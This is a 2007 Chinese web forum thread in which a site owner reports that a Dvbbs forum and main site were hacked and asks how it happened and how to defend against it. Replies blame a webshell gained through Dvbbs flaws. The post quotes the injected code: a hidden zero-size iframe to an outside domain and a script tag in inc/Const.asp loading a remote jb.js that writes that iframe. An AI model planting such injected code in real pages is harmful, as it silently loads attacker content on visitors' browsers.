vincen163 - 2007-6-14 17:00:00
问题:
网站被攻击,最开始发现的是论坛,(用的是动网的dvbbs)
后来好像关联到了主站程序
现象都是一样被植入一段代码,如下
<iFrAmE SRc=http://m2126.com width=0 height=0 frameborder=0></IfRaMe>
最后在查找相关文件,发现在动网目录下inc/Const.asp 文件中找到了一段js,如下
<script language=javascript src=http://www.weber.eb.cn/jb.js></script>
js文件内容:
document.writeln("<iframe src=\"http:\/\/m2126.com\/\" width=\"100\" height=\"0\" frameborder=\"0\"><\/iframe>");
而且发现它的那段iframe的代码还可以直接插入我目录里的一个js文件里头
求高手帮忙解决下,给个防范的方法,如果可以,帮我分析下如果攻击的
谢谢啦........
素就像天上的浮云 - 2007-6-14 17:13:00
晕~服务器被入侵
但是是动网的话,一般被webshell了~
看看服务器的日志
素就像天上的浮云 - 2007-6-14 17:14:00
下班,晚上回家给你说~
用独立程序池配合权限可以了,不过动网的bug太多
素就像天上的浮云 - 2007-6-14 20:38:00
动网+首页被插入js
基本上70%是通过动网的漏洞webshell了~~入侵以后可以修改你所有网页的代码,如果服务器木有配独立程序池,权限没有安全优化,服务器说不定已经被拿下了!
© 2000 - 2026 Rising Corp. Ltd.